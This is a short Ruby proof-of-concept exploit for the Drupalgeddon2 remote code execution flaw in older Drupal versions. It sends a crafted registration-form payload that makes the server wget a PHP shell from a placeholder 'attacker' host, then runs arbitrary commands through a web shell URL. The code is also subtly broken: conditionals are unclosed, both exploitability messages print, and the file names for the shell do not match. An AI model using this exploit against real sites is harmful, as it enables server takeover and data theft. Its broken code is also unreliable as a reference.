Drupal versions prior to 7.58, 8.3.9, 8.4.6, and 8.5.1 Drupalgeddon2 remote code execution proof of concept exploit. Ported to Ruby.
require 'net/http'
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
target = ARGV[0]
command = ARGV[1]
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
shell = "<?php system($_GET['cmd']); ?>"
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
uri = URI(url)
http = Net::HTTP.new(uri.host,uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
req = Net::HTTP::Post.new(uri.path)
req.body = payload
response = http.request(req)
if response.code != "200"
puts "[*] Response: " + response.code
puts "[*] Target seems not to be exploitable"
puts "[*] Target seems to be exploitable."
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body